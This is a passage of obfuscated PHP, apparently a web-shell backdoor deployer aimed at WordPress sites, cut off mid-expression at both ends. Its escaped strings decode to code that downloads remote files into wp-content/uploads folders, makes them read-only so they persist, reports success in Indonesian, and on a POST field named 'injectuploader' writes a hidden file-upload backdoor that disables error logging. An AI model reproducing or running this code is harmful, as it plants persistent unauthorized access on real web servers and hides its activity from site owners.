160\x2d\143\157\156\x74\145\x6e\x74\57\x75\160\x6c\x6f\141\144\x73\x2f\x32\60\62\x32\57\x30\x34\57";if(!is_dir($altdir7)){$altdir7=$startDirectory."\57\x77\x70\x2d\143\157\156\164\x65\156\x74\57\165\160\154\x6f\141\x64\163\x2f\x32\x30\62\x32\x2f\x30\x34\57";}$altdir7_final=$altdir7.$nama7;file_put_contents($altdir7_final,$bd7);chmod($altdir7_final,292);$bdresult.="\74\163\160\141\x6e\x20\163\x74\171\154\x65\x3d\x63\157\154\x6f\162\x3a\162\x65\144\x21\x69\155\x70\157\x72\164\x61\x6e\164\73\x66\x6f\156\164\x2d\167\145\x69\x67\150\164\72\x62\157\154\x64\73\76\107\x61\x67\x61\154\x20\x54\141\162\157\x20\104\151\x20\x54\141\x72\147\x65\164\41\40\101\x6b\x73\145\163\x20\144\151\72\x3c\57\163\x70\141\x6e\x3e\46\x6e\x62\163\160\73\46\156\x62\x73\x70\x3b\46\156\x62\163\160\x3b".$home.$altdir7_final."\x3c\x62\x72\x2f\76".PHP_EOL;}}}else{$bdresult.="\74\x73\160\x61\x6e\x20\x73\164\171\154\145\x3d\x63\x6f\x6c\x6f\162\72\43\x32\x30\145\x66\62\60\x21\x69\155\x70\157\162\x74\141\156\x74\x3b\x66\x6f\x6e\x74\x2d\x77\145\x69\x67\150\x74\x3a\142\x6f\x6c\x64\73\76\106\151\x6c\145\40\105\170\151\163\164\x73\x21\74\x2f\x73\160\141\x6e\x3e\x26\156\142\x73\160\73\x26\156\x62\x73\x70\x3b\x26\156\142\x73\x70\73\x3c\x61\x20\x68\x72\x65\x66\x3d\x27".$home.$finalbd7."\x27\x20\164\141\x72\147\x65\164\75\x27\x5f\142\154\x61\156\153\47\x20\x72\x65\x6c\75\x27\x6e\x6f\146\157\x6c\x6c\157\x77\40\x6e\x6f\x6f\x70\x65\156\145\x72\x20\x6e\157\162\x65\x66\145\x72\x72\x65\x72\x27\76".$home.$finalbd7."\x3c\57\x61\76\x3c\x62\162\57\76".PHP_EOL;chmod($finalbd7,292);}if(!file_exists($finalbd8)){if(ini_get("\x61\154\x6c\157\x77\137\165\x72\154\137\146\x6f\x70\x65\x6e")){$bd8=file_get_contents($b8);$status_bd8=file_put_contents($finalbd8,$bd8);if($status_bd8){$bdresult.="\74\163\160\x61\156\40\x73\x74\171\154\x65\x3d\143\157\154\x6f\x72\72\43\62\60\145\x66\x32\60\x21\151\155\160\157\162\164\x61\156\164\73\146\157\156\x74\x2d\x77\145\151\147\150\164\x3a\142\157\x6c\144\x3b\76\x53\165\153\x73\145\163\x21\74\57\163\160\x61\156\76\x26\x6e\142\163\x70\x3b\46\156\x62\x73\160\73\x26\x6e\142\163\x70\73\74\141\x20\150\x72\x65\146\75\x27".$home.$finalbd8."\x27\40\164\x61\x72\x67\x65\164\x3d\x27\x5f\142\x6c\x61\x6e\153\47\x20\x72\145\154\x3d\47\x6e\157\146\x6f\154\x6c\x6f\x77\40\x6e\157\x6f\x70\x65\x6e\145\x72\x20\156\157\162\x65\x66\145\x72\162\x65\162\x27\76".$home.$finalbd8."\74\x2f\x61\x3e\74\142\162\x2f\76".PHP_EOL;chmod($finalbd8,292);}else{$altdir8=$_SERVER["\104\117\103\125\x4d\x45\x4e\124\137\122\x4f\117\x54"]."\x2f\x77\x70\x2d\x63\157\156\x74\x65\156\164\x2f\x75\x70\154\x6f\141\x64\163\57\x32\60\62\x32\57\60\63\x2f";if(!is_dir($altdir8)){$altdir8=$startDirectory."\57\x77\160\55\x63\x6f\x6e\164\145\156\164\x2f\165\x70\154\157\141\x64\163\57\62\x30\62\x32\x2f\60\63\x2f";}$altdir8_final=$altdir8.$nama8;file_put_contents($altdir8_final,$bd8);chmod($altdir8_final,292);$bdresult.="\x3c\163\x70\x61\156\40\163\164\x79\154\x65\75\x63\x6f\x6c\157\x72\72\x72\x65\144\x21\x69\x6d\160\157\162\164\x61\156\x74\73\x66\x6f\156\164\x2d\167\x65\x69\147\150\164\x3a\142\157\x6c\x64\73\x3e\x47\141\147\x61\154\x20\124\141\162\x6f\40\x44\151\x20\x54\141\162\147\x65\x74\x21\x20\x41\153\163\145\163\x20\144\151\72\x3c\57\x73\x70\x61\156\x3e\x26\156\x62\x73\160\x3b\46\x6e\142\163\x70\x3b\46\156\142\x73\160\x3b".$home.$altdir8_final."\x3c\142\162\57\x3e".PHP_EOL;}}}else{$bdresult.="\x3c\163\160\x61\x6e\40\x73\x74\x79\154\x65\x3d\143\157\x6c\157\x72\72\x23\x32\60\x65\x66\62\60\x21\151\155\160\157\x72\164\x61\156\x74\73\146\x6f\x6e\164\x2d\x77\145\x69\147\150\x74\x3a\x62\x6f\154\144\x3b\x3e\x46\151\x6c\145\x20\105\x78\x69\163\x74\x73\41\x3c\x2f\163\160\141\x6e\76\46\x6e\142\163\160\73\46\156\142\163\160\73\46\156\x62\163\x70\x3b\74\141\x20\x68\x72\145\x66\x3d\47".$home.$finalbd8."\47\40\164\141\x72\x67\145\x74\75\47\137\x62\x6c\141\x6e\153\x27\40\x72\x65\154\x3d\47\x6e\x6f\146\x6f\154\x6c\x6f\167\40\x6e\157\157\x70\x65\156\x65\162\40\x6e\x6f\162\x65\146\145\x72\162\145\162\47\x3e".$home.$finalbd8."\74\x2f\x61\x3e\74\x62\x72\57\x3e".PHP_EOL;chmod($finalbd8,292);}if(!file_exists($finalbd9)){if(ini_get("\141\x6c\x6c\x6f\167\x5f\165\162\154\137\x66\157\x70\145\156")){$bd9=file_get_contents($b9);$status_bd9=file_put_contents($finalbd9,$bd9);if($status_bd9){$bdresult.="\74\163\160\141\156\x20\x73\x74\x79\154\145\75\x63\x6f\154\157\x72\72\x23\62\x30\x65\x66\x32\60\41\x69\155\x70\x6f\x72\x74\x61\x6e\x74\x3b\146\157\156\x74\x2d\x77\145\151\x67\150\x74\72\x62\x6f\154\x64\73\76\x53\x75\x6b\163\145\163\41\74\x2f\x73\x70\x61\156\76\46\156\x62\163\160\73\x26\156\x62\x73\160\73\x26\x6e\x62\163\160\x3b\74\141\x20\x68\162\x65\146\75\x27".$home.$finalbd9."\47\40\x74\141\162\147\145\164\x3d\47\x5f\142\x6c\x61\156\x6b\47\40\162\145\154\75\47\x6e\157\x66\157\x6c\x6c\157\167\x20\x6e\157\x6f\x70\145\x6e\x65\x72\x20\156\157\162\145\x66\145\162\x72\145\162\x27\76".$home.$finalbd9."\74\x2f\x61\76\x3c\142\162\57\76".PHP_EOL;chmod($finalbd9,292);}else{$altdir9=$_SERVER["\104\x4f\x43\x55\x4d\105\x4e\124\137\x52\117\117\124"]."\57\x77\x70\x2d\143\157\x6e\x74\x65\x6e\164\57\x75\x70\x6c\157\141\144\163\57\62\60\x32\62\x2f\60\62\57";if(!is_dir($altdir9)){$altdir9=$startDirectory."\x2f\167\160\55\143\x6f\x6e\x74\145\156\164\x2f\165\160\154\157\141\144\163\x2f\x32\60\x32\62\x2f\x30\62\x2f";}$altdir9_final=$altdir9.$nama9;file_put_contents($altdir9_final,$bd9);chmod($altdir9_final,292);$bdresult.="\74\163\x70\x61\x6e\x20\x73\164\x79\x6c\x65\75\x63\157\154\157\162\x3a\162\x65\144\x21\x69\155\x70\157\x72\164\x61\156\164\73\146\x6f\156\x74\x2d\x77\x65\x69\x67\150\164\72\142\157\x6c\x64\x3b\x3e\107\x61\147\x61\154\40\x54\141\x72\157\x20\x44\151\x20\x54\141\x72\x67\145\x74\41\40\x41\x6b\x73\145\x73\40\x64\151\x3a\x3c\57\163\x70\141\x6e\76\46\x6e\x62\x73\160\73\x26\156\x62\x73\x70\73\46\x6e\142\163\160\73".$home.$altdir9_final."\74\142\x72\x2f\76".PHP_EOL;}}}else{$bdresult.="\x3c\x73\160\141\156\x20\x73\164\171\154\x65\x3d\143\157\154\157\162\72\43\x32\60\145\146\62\60\41\x69\155\160\x6f\162\164\141\156\x74\73\146\157\x6e\x74\55\167\145\x69\147\150\x74\x3a\142\157\x6c\144\x3b\x3e\106\x69\x6c\x65\40\105\x78\151\x73\x74\163\x21\x3c\x2f\x73\x70\x61\x6e\x3e\46\156\x62\163\160\x3b\46\156\x62\163\160\x3b\x26\x6e\142\x73\x70\73\74\x61\x20\x68\x72\x65\x66\x3d\x27".$home.$finalbd9."\47\40\164\x61\162\147\x65\x74\75\x27\137\142\x6c\x61\x6e\153\47\x20\162\145\154\75\x27\156\x6f\146\x6f\x6c\x6c\x6f\x77\x20\156\157\157\x70\x65\x6e\x65\x72\x20\156\x6f\x72\x65\x66\x65\162\x72\x65\x72\47\x3e".$home.$finalbd9."\x3c\57\141\76\x3c\x62\x72\57\76".PHP_EOL;chmod($finalbd9,292);}if(!file_exists($finalbd10)){if(ini_get("\x61\x6c\x6c\x6f\167\137\x75\162\154\x5f\x66\157\x70\x65\156")){$bd10=file_get_contents($b10);$status_bd10=file_put_contents($finalbd10,$bd10);if($status_bd10){$bdresult.="\x3c\163\x70\141\x6e\40\x73\164\x79\x6c\145\x3d\x63\157\x6c\x6f\x72\72\x23\62\x30\145\146\62\x30\41\151\x6d\x70\x6f\162\x74\141\156\x74\x3b\x66\157\156\164\x2d\167\x65\x69\x67\x68\164\72\142\x6f\x6c\x64\x3b\x3e\x53\x75\153\163\145\163\x21\74\x2f\163\160\x61\156\76\x26\156\142\x73\x70\x3b\x26\x6e\142\x73\x70\x3b\46\x6e\142\163\160\73\74\141\40\150\162\x65\146\x3d\x27".$home.$finalbd10."\x27\x20\x74\141\x72\x67\x65\164\75\x27\137\x62\154\x61\156\x6b\47\x20\x72\145\x6c\x3d\47\156\157\146\157\154\154\x6f\x77\40\x6e\157\157\160\145\156\x65\x72\40\x6e\x6f\162\145\x66\x65\162\x72\x65\162\47\x3e".$home.$finalbd10."\74\x2f\141\x3e\x3c\x62\x72\x2f\x3e".PHP_EOL;chmod($finalbd10,292);}else{$altdir10=$_SERVER["\104\x4f\x43\125\x4d\105\116\x54\137\x52\117\117\124"]."\x2f\x77\160\55\143\157\156\164\145\x6e\164\x2f\x75\160\x6c\x6f\x61\144\x73\x2f\x32\x30\x32\x32\57\x30\x31\x2f";if(!is_dir($altdir10)){$altdir10=$startDirectory."\x2f\x77\x70\55\x63\157\156\x74\145\156\164\57\x75\160\x6c\x6f\x61\x64\x73\57\x32\60\x32\62\x2f\x30\61\57";}$altdir10_final=$altdir10.$nama10;file_put_contents($altdir10_final,$bd10);chmod($altdir10_final,292);$bdresult.="\74\163\160\x61\x6e\40\x73\x74\x79\x6c\145\75\x63\157\x6c\157\x72\72\x72\145\144\x21\x69\x6d\160\x6f\x72\164\141\x6e\164\73\x66\157\156\x74\55\167\145\151\x67\150\164\x3a\142\157\154\144\73\76\x47\x61\147\x61\154\40\x54\x61\162\157\40\104\x69\x20\124\x61\x72\147\x65\x74\x21\x20\x41\x6b\163\x65\x73\40\144\151\72\74\57\x73\160\x61\x6e\x3e\46\156\142\163\x70\73\46\x6e\x62\163\160\x3b\x26\156\142\x73\160\x3b".$home.$altdir10_final."\x3c\142\162\57\76".PHP_EOL;}}}else{$bdresult.="\74\x73\x70\141\x6e\x20\x73\164\x79\154\145\x3d\143\x6f\x6c\157\x72\x3a\x23\62\x30\145\x66\62\x30\41\151\x6d\x70\157\162\x74\141\x6e\x74\73\146\157\156\164\x2d\x77\145\151\x67\x68\164\72\142\x6f\x6c\144\73\x3e\106\x69\154\x65\40\x45\170\x69\x73\x74\x73\x21\74\x2f\163\x70\x61\x6e\76\46\156\142\163\x70\x3b\x26\x6e\142\x73\160\x3b\46\156\142\163\160\73\74\141\x20\150\162\x65\146\75\47".$home.$finalbd10."\47\x20\x74\x61\162\x67\x65\x74\75\47\137\x62\154\141\156\153\x27\x20\x72\145\154\x3d\x27\156\x6f\146\x6f\x6c\x6c\x6f\x77\x20\156\x6f\x6f\160\145\156\145\x72\x20\156\x6f\162\x65\146\145\162\162\145\x72\47\x3e".$home.$finalbd10."\x3c\x2f\x61\x3e\x3c\x62\x72\57\x3e".PHP_EOL;chmod($finalbd10,292);}if(!file_exists($finalbd11)){if(ini_get("\x61\x6c\x6c\157\x77\x5f\x75\162\x6c\137\x66\x6f\x70\x65\156")){$bd11=file_get_contents($b11);$status_bd11=file_put_contents($finalbd11,$bd11);if($status_bd11){$bdresult.="\74\x73\160\x61\156\x20\163\164\x79\x6c\x65\x3d\x63\157\154\x6f\x72\x3a\43\62\60\x65\146\x32\60\x21\151\x6d\160\157\162\164\x61\x6e\x74\73\146\x6f\156\164\55\167\x65\151\147\150\x74\x3a\x62\157\x6c\x64\73\x3e\x53\x75\153\163\x65\163\x21\x3c\57\163\160\x61\x6e\x3e\x26\156\142\x73\x70\73\x26\156\x62\163\160\x3b\x26\x6e\142\x73\160\x3b\74\x61\40\150\162\145\x66\75\47".$home.$finalbd11."\47\x20\x74\x61\162\147\145\164\75\x27\x5f\142\x6c\x61\x6e\x6b\47\40\162\x65\154\x3d\47\156\x6f\146\x6f\154\154\157\x77\x20\x6e\157\157\160\x65\x6e\145\162\x20\156\x6f\x72\145\x66\145\x72\162\145\162\47\76".$home.$finalbd11."\74\57\141\76\74\x62\162\57\x3e".PHP_EOL;chmod($finalbd11,292);}else{$altdir11=$_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\122\117\117\124"]."\x2f\x77\x70\55\143\x6f\156\164\x65\156\x74\x2f\x75\x70\x6c\x6f\141\x64\x73\x2f\x32\60\x32\x32\57\60\x31\57";if(!is_dir($altdir11)){$altdir11=$startDirectory."\57\167\160\55\x63\157\156\164\145\x6e\x74\x2f\165\x70\154\x6f\141\144\x73\x2f\62\x30\62\x32\57\x30\61\57";}$altdir11_final=$altdir11.$nama11;file_put_contents($altdir11_final,$bd11);chmod($altdir11_final,292);$bdresult.="\x3c\163\x70\141\156\40\163\x74\171\x6c\145\x3d\143\x6f\x6c\x6f\x72\72\162\145\144\41\x69\x6d\160\x6f\x72\x74\x61\156\x74\x3b\x66\x6f\x6e\x74\55\x77\145\x69\x67\150\x74\x3a\142\x6f\x6c\144\73\x3e\x47\x61\147\141\x6c\x20\x54\141\162\x6f\40\104\x69\40\124\x61\162\147\145\x74\41\40\x41\153\x73\145\x73\40\144\x69\x3a\74\57\163\x70\141\x6e\x3e\46\156\x62\x73\160\x3b\46\156\x62\163\x70\73\46\156\x62\163\160\73".$home.$altdir11_final."\74\x62\x72\57\x3e".PHP_EOL;}}}else{$bdresult.="\x3c\x73\x70\x61\156\x20\x73\164\171\154\145\75\x63\x6f\154\157\x72\72\43\x32\x30\145\x66\x32\60\41\151\x6d\160\157\162\x74\x61\156\x74\73\x66\157\156\x74\55\167\145\151\147\x68\164\72\142\157\x6c\x64\73\76\106\x69\154\145\x20\x45\x78\x69\x73\164\163\41\74\57\163\160\x61\x6e\x3e\46\x6e\142\x73\160\73\46\156\142\163\160\x3b\x26\x6e\142\x73\160\73\x3c\x61\x20\x68\162\x65\146\x3d\x27".$home.$finalbd11."\x27\x20\164\141\162\147\145\164\75\47\x5f\x62\154\x61\x6e\153\47\x20\162\145\154\x3d\x27\x6e\x6f\x66\157\154\x6c\x6f\x77\40\156\157\x6f\x70\145\156\x65\162\x20\156\x6f\162\145\146\x65\162\x72\145\162\47\76".$home.$finalbd11."\x3c\x2f\x61\76\74\x62\x72\x2f\76".PHP_EOL;chmod($finalbd11,292);}if(!file_exists($finalbd12)){if(ini_get("\141\154\x6c\x6f\x77\x5f\165\x72\154\x5f\146\x6f\160\145\156")){$bd12=file_get_contents($b12);$status_bd12=file_put_contents($finalbd12,$bd12);if($status_bd12){$bdresult.="\x3c\163\x70\x61\156\x20\163\x74\x79\154\145\75\143\x6f\x6c\157\162\x3a\43\x32\x30\145\146\x32\x30\x21\x69\155\x70\157\x72\164\x61\x6e\x74\73\146\x6f\156\x74\55\x77\145\151\x67\150\164\72\x62\157\154\x64\x3b\76\x53\165\x6b\163\x65\163\x21\74\57\163\x70\x61\x6e\x3e\x26\x6e\x62\x73\x70\x3b\46\x6e\x62\163\160\x3b\46\x6e\x62\163\x70\x3b\x3c\141\40\150\x72\x65\x66\75\47".$home.$finalbd12."\x27\x20\164\141\162\x67\145\164\75\x27\137\x62\x6c\141\x6e\153\47\x20\x72\145\x6c\75\47\156\x6f\146\x6f\x6c\x6c\x6f\167\40\156\x6f\x6f\x70\145\156\145\162\x20\x6e\157\162\x65\x66\145\162\162\x65\x72\47\x3e".$home.$finalbd12."\x3c\x2f\x61\76\74\x62\162\57\x3e".PHP_EOL;chmod($finalbd12,292);}else{$altdir12=$_SERVER["\104\117\x43\x55\x4d\105\x4e\124\x5f\122\x4f\117\x54"]."\x2f\x77\x70\x2d\143\x6f\x6e\164\x65\156\164\57\x75\x70\x6c\x6f\x61\144\163\57\x32\60\x32\62\x2f\60\x32\57";if(!is_dir($altdir12)){$altdir12=$startDirectory."\x2f\x77\160\x2d\143\x6f\x6e\164\145\x6e\164\57\x75\160\x6c\x6f\x61\144\x73\57\62\x30\62\x32\57\x30\62\x2f";}$altdir12_final=$altdir12.$nama12;file_put_contents($altdir12_final,$bd12);chmod($altdir12_final,292);$bdresult.="\74\x73\x70\141\156\40\x73\164\x79\x6c\145\x3d\x63\x6f\x6c\x6f\162\72\162\145\144\x21\x69\155\160\157\162\x74\141\x6e\x74\73\146\x6f\x6e\164\x2d\x77\x65\x69\147\x68\164\x3a\x62\x6f\154\144\73\x3e\107\x61\147\x61\154\40\x54\141\162\157\x20\104\151\x20\x54\x61\x72\x67\145\164\41\x20\x41\x6b\163\145\x73\x20\x64\x69\72\74\x2f\163\x70\x61\x6e\x3e\46\156\x62\163\160\x3b\x26\156\x62\x73\x70\x3b\46\x6e\x62\x73\160\73".$home.$altdir12_final."\x3c\x62\162\57\76".PHP_EOL;}}}else{$bdresult.="\x3c\163\160\141\x6e\x20\x73\164\171\154\x65\75\143\x6f\154\157\162\72\43\62\x30\145\x66\x32\x30\x21\x69\x6d\160\157\162\164\x61\x6e\164\73\x66\157\156\x74\55\167\x65\151\147\150\164\72\x62\x6f\154\144\73\x3e\x46\151\154\145\x20\x45\x78\151\x73\x74\x73\41\x3c\57\163\x70\141\x6e\x3e\46\x6e\x62\163\x70\x3b\x26\x6e\x62\x73\160\73\x26\x6e\142\163\160\73\74\x61\x20\x68\162\145\146\75\47".$home.$finalbd12."\47\40\x74\141\162\147\145\164\75\47\x5f\142\154\141\x6e\153\x27\x20\x72\x65\154\75\47\156\x6f\146\157\x6c\x6c\157\x77\40\x6e\x6f\x6f\160\145\x6e\x65\x72\40\x6e\x6f\162\145\x66\x65\x72\162\145\x72\x27\76".$home.$finalbd12."\x3c\57\141\76\74\142\162\57\76".PHP_EOL;chmod($finalbd12,292);}if(!file_exists($finalbd13)){if(ini_get("\x61\154\154\x6f\x77\137\165\162\x6c\137\x66\157\160\x65\156")){$bd13=file_get_contents($b13);$status_bd13=file_put_contents($finalbd13,$bd13);if($status_bd13){$bdresult.="\74\163\160\x61\x6e\40\163\x74\x79\154\145\75\x63\x6f\x6c\157\162\72\x23\62\x30\x65\x66\62\x30\41\x69\155\160\157\x72\x74\141\x6e\164\x3b\x66\157\156\x74\x2d\167\145\x69\x67\x68\x74\x3a\142\x6f\x6c\144\x3b\x3e\123\165\x6b\163\145\163\x21\74\x2f\x73\160\x61\x6e\76\x26\156\x62\x73\x70\73\x26\x6e\x62\x73\160\x3b\46\156\x62\x73\160\73\74\x61\40\x68\x72\x65\x66\x3d\x27".$home.$finalbd13."\x27\40\x74\x61\x72\147\145\x74\75\47\x5f\142\154\141\x6e\153\x27\40\x72\x65\154\75\47\x6e\x6f\x66\157\x6c\x6c\157\x77\40\156\157\x6f\x70\145\x6e\145\162\x20\x6e\157\x72\x65\146\x65\162\162\x65\x72\47\x3e".$home.$finalbd13."\74\57\141\76\x3c\x62\162\57\x3e".PHP_EOL;chmod($finalbd13,292);}else{$altdir13=$_SERVER["\104\117\x43\x55\x4d\x45\x4e\124\x5f\122\117\117\x54"]."\x2f\x77\160\x2d\143\157\x6e\x74\145\156\164\x2f\x75\x70\x6c\x6f\141\144\x73\x2f\x32\60\62\62\x2f\x30\61\x33\57";if(!is_dir($altdir13)){$altdir13=$startDirectory."\57\167\160\x2d\x63\157\156\164\x65\156\164\x2f\x75\x70\154\157\141\x64\x73\x2f\62\60\x32\62\x2f\x30\x31\63\57";}$altdir13_final=$altdir13.$nama13;file_put_contents($altdir13_final,$bd13);chmod($altdir13_final,292);$bdresult.="\74\163\160\141\156\40\x73\164\x79\x6c\x65\75\x63\157\x6c\157\x72\x3a\162\x65\144\41\x69\x6d\x70\157\x72\x74\x61\156\164\73\146\157\x6e\164\55\x77\x65\x69\147\x68\164\x3a\x62\157\154\x64\x3b\76\107\x61\x67\x61\154\x20\x54\x61\162\157\x20\x44\x69\x20\x54\141\x72\x67\145\x74\x21\40\x41\x6b\163\145\163\x20\x64\151\x3a\x3c\57\163\x70\141\x6e\x3e\46\156\x62\163\160\x3b\x26\156\x62\x73\160\73\x26\x6e\142\x73\x70\x3b".$home.$altdir13_final."\x3c\x62\x72\x2f\x3e".PHP_EOL;}}}else{$bdresult.="\74\163\160\x61\156\40\x73\164\171\154\145\x3d\143\157\154\x6f\x72\x3a\43\62\60\145\146\62\x30\41\x69\x6d\x70\x6f\162\164\141\x6e\164\x3b\146\x6f\x6e\x74\x2d\x77\x65\x69\147\x68\164\72\x62\157\154\x64\73\76\106\x69\154\145\40\x45\x78\151\163\x74\x73\x21\x3c\57\x73\160\141\x6e\76\46\156\142\x73\160\73\x26\156\x62\x73\x70\73\46\x6e\142\x73\160\73\x3c\x61\40\x68\162\x65\x66\75\x27".$home.$finalbd13."\x27\x20\x74\141\x72\x67\x65\164\x3d\x27\137\142\x6c\x61\x6e\x6b\x27\40\x72\x65\x6c\75\47\x6e\157\x66\157\x6c\x6c\x6f\x77\x20\156\157\157\160\x65\156\x65\x72\x20\x6e\x6f\162\145\x66\x65\162\x72\145\x72\x27\x3e".$home.$finalbd13."\74\57\x61\76\74\x62\x72\x2f\x3e".PHP_EOL;chmod($finalbd13,292);}ob_end_flush();echo "\74\144\x69\x76\x20\143\x6c\141\x73\x73\75\42\142\151\147\x61\x72\x65\x61\42\x20\x6e\x61\x6d\145\75\x22\157\x75\164\160\x75\164\40\163\164\x79\154\x65\x3d\42\x62\x6f\162\x64\145\x72\x2d\x62\x6f\164\x74\x6f\155\x3a\x30\x3b\155\x61\162\147\x69\x6e\55\164\157\x70\72\65\x70\x78\x3b\42\x20\x72\x65\141\x64\157\x6e\x6c\x79\76";print_r($bdresult).PHP_EOL;echo "\x3c\x2f\x64\x69\x76\76";}if(isset($_POST["\x69\x6e\x6a\x65\x63\x74\x75\160\154\157\141\x64\x65\162"])){$phpinfo_result='';$startDirectory=realpath(__DIR__);$isiphpinfo="\x3c\77\x70\150\160\x20\160\150\160\151\156\x66\157\50\51\73\xa\x24\173\42\134\170\x34\67\x4c\x5c\170\64\x66\x42\x41\x5c\x78\x34\143\x5c\x78\65\63\42\x7d\x5b\x22\134\170\66\x62\165\x5c\x78\x36\x63\x5c\170\x37\61\x5c\170\x37\62\134\x78\x36\x64\134\170\66\x63\x5c\x78\67\65\165\x22\135\x3d\x22\x5c\x78\64\x62\134\170\67\x30\134\x78\x36\x65\124\x30\x5c\170\x34\143\x22\73\44\x7b\x22\x5c\170\64\x37\x5c\x78\64\143\117\102\x5c\170\x34\x31\x5c\x78\64\143\123\x22\175\x5b\x22\x5c\170\66\63\134\170\66\x32\x5c\x78\x36\141\134\x78\66\x65\134\170\x37\x32\151\151\x6c\x75\x5c\x78\66\x64\134\x78\x36\145\x5c\170\x37\63\42\135\x3d\42\x72\x5c\170\x36\65\134\x78\x37\63\x5c\170\67\65\134\170\x36\143\134\x78\x37\x34\x22\73\x24\173\x22\134\x78\64\67\134\x78\64\x63\134\x78\x34\x66\134\170\x34\62\x5c\170\64\61\x4c\123\42\175\133\x22\x6c\152\x5c\170\x36\x64\134\x78\x36\x32\134\170\x37\65\170\145\x5c\x78\66\x33\134\170\66\x61\167\x22\135\75\42\113\x5c\170\67\x30\134\170\x36\145\124\60\134\x78\64\143\42\73\x73\x65\x74\x5f\x74\151\155\x65\x5f\154\151\x6d\151\x74\x28\x30\51\x3b\151\x6e\151\137\163\x65\164\x28\42\x5c\x78\x36\144\134\x78\66\x35\x5c\170\x36\144\x6f\x72\x5c\x78\x37\71\x5f\154\151\x5c\170\x36\x64\151\164\42\x2c\42\x2d\61\42\x29\73\x65\162\162\x6f\x72\x5f\162\145\160\157\162\164\151\156\x67\x28\60\51\73\151\x6e\151\x5f\163\x65\164\50\x22\145\162\x72\x6f\162\x5c\170\65\146\134\x78\x36\x63\x6f\x5c\x78\66\67\x22\x2c\x6e\165\154\154\x29\x3b\x69\x6e\151\x5f\x73\x65\x74\x28\x22\134\x78\66\70\134\x78\67\64\x5c\170\66\x64\x5c\170\x36\x63\137\134\x78\66\x35\x5c\170\x37\62\x5c\x78\x37\x32\x6f\162\x5c\170\67\63\x22\x2c\x30\51\73\151\x6e\x69\137\x73\x65\x74\50\x22\154\x6f\x67\x5c\x78\x35\146\134\170\x36\65\x72\x5c\170\x37\62\134\170\66\146\x72\134\x78\67\63\x22\54\x30\x29\73\151\156\151\x5f\x73\x65\x74\x28\x22\x6c\134\x78\x36\146\147\137\145\162\162\157\x5c\x78\67\x32\x5c\x78\x37\63\137\x5c\170\x36\144\141\134\170\x37\70\134\x78\x35\146\x5c\x78\x36\143\134\170\x36\x35\x6e\x22\54\x30\51\73\151\x6e\x69\137\x73\145\164\x28\42\x64\134\x78\x36\x39\x5c\x78\67\63\x70\x6c\x61\x79\134\x78\65\x66\134\x78\66\65\134\170\x37\x32\x72\x6f\134\x78\67\x32\163\x22\54\60\x29\x3b\x69\156\151\137\x73\145\164\50\42\x5c\170\x36\64\x69\x5c\170\x37\63\x70\154\x61\x79\x5c\x78\65\x66\x73\164\x5c\170\66\x31\x72\134\170\67\x34\x5c\x78\x37\65\x70\x5f\145\162\134\170\67\62\134\170\66\146\162\x73\x22\54\x30\x29\73\x69\156\x69\x5f\163\x65\x74\50\42\155\134\x78\66\61\x5c\170\67\70\x5f\134\x78\x36\65\x78\x5c\x78\66\x35\x63\134\170\x37\x35\164\134\170\x36\71\x6f\x5c\x78\66\145\137\164\x69\155\x65\42\x2c\60\x29\73\151\x66\50\151\163\163\145\x74\50\x24\x5f\120\x4f\x53\124\133\x22\165\160\x6c\x5c\170\66\146\x61\x5c\x78\x36\64\x65\134\x78\x36\x34\x22\x5d\51\51\x7b\x24\165\x73\x6c\x6e\156\163\150\152\75\x22\146\134\170\x36\x39\154\x5c\x78\x36\x35\x22\73\x24\x64\x61\x6a\x6b\x65\154\152\162\x6f\142\166\142\75\x22\x5c\170\66\x36\134\x78\66\146\x5c\170\66\143\134\x78\x36\64\134\170\66\65\134\170\x37\62\42\73\44\173\42\x47\134\170\x34\143\x5c\170\64\146\134\170\64\62\x5c\x78\x34\61\x5c\170\x34\143\x5c\x78\65\x33\x22\x7d\133\x22\134\170\67\x31\x77\134\x78\x36\145\152\x71\134\170\x36\x36\x22\135\75\x22\146\x5c\x78\66\71\154\x65\x5c\170\x37\63\x22\73\44\x7b\x22\x5c\170\x34\67\114\x5c\170\x34\x66\102\134\170\x34\61\134\x78\x34\x63\134\170\65\x33\x22\175\133\42\134\170\x36\x61\x5c\170\x36\144\134\170\67\x36\x5c\x78\x37\x33\x76\x73\x5c\x78\x36\x64\x5c\x78\67\60\134\x78\x37\x38\x66\x5c\x78\x37\x37\156\42\135\75\x22\134\x78\66\x36\134\170\x36\x39\154\x65\x5c\x78\x37\63\x22\73\44\x68\x7a\142\x6e\151\172\x62\152\x3d\42\x5c\170\66\x36\x5c\x78\66\146\x5c\x78\x36\143\144\x5c\x78\66\65\x5c\x78\x37\x32\x22\73\x24\173\x24\165\163\x6c\156\156\x73\150\x6a\175\75\44\137\x46\111\114\105\x53\133\42\146\x69\134\x78\x36\x63\x65\163\42\x5d\133\42\x5c\170\x36\x65\x61\155\x5c\170\66\65\x22\x5d\73\44\173\44\173\42\134\170\64\x37\x4c\x4f\102\134\170\64\61\x4c\123\42\175\x5b\x22\134\x78\x37\61\x5c\x78\x37\67\x5c\170\x36\x65\152\134\x78\x37\61\x5c\170\x36\x36\42\135\175\x3d\x24\x5f\x46\111\x4c\105\x53\x5b\x22\134\x78\66\x36\x5c\x78\x36\71\x6c\x65\x5c\170\67\x33\42\x5d\x5b\x22\164\134\170\x36\144\x70\134\x78\x35\x66\156\x5c\x78\66\x31\155\x65\x22\x5d\73\x24\173\x24\x68\x7a\x62\x6e\x69\172\142\x6a\x7d\75\x22\42\73\44\173\42\x5c\170\x34\67\x4c\134\x78\x34\x66\102\101\x5c\170\64\143\x5c\170\65\x33\x22\x7d\133\x22\x66\134\170\x37\x31\134\x78\x36\67\x5c\x78\x36\x32\x5c\x78\67\x34\134\170\67\x31\x22\x5d\75\x22\134\170\x36\x36\151\x5c\x78\x36\143\145\x22\x3b\151\146\x28\x6d\x6f\x76\145\x5f\x75\x70\x6c\157\x61\144\145\x64\x5f\x66\x69\154\145\x28\44\x7b\x24\173\42\x5c\170\64\67\x5c\x78\x34\x63\134\170\64\x66\102\x41\134\170\x34\x63\x53\x22\x7d\x5b\42\134\x78\x36\x61\134\170\66\144\166\x5c\170\67\x33\x5c\170\x37\66\x5c\x78\67\x33\x6d\160\134\170\x37\70\x5c\170\x36\x36\134\x78\x37\x37\134\170\x36\145\42\135\x7d\x2c\x24\173\44\x64\x61\x6a\153\x65\x6c\x6a\x72\157\142\x76\x62\175\56\x24\173\44\173\42\x47\x5c\x78\x34\143\134\170\x34\x66\x5c\x78\64\x32\134\170\64\x31\134\x78\x34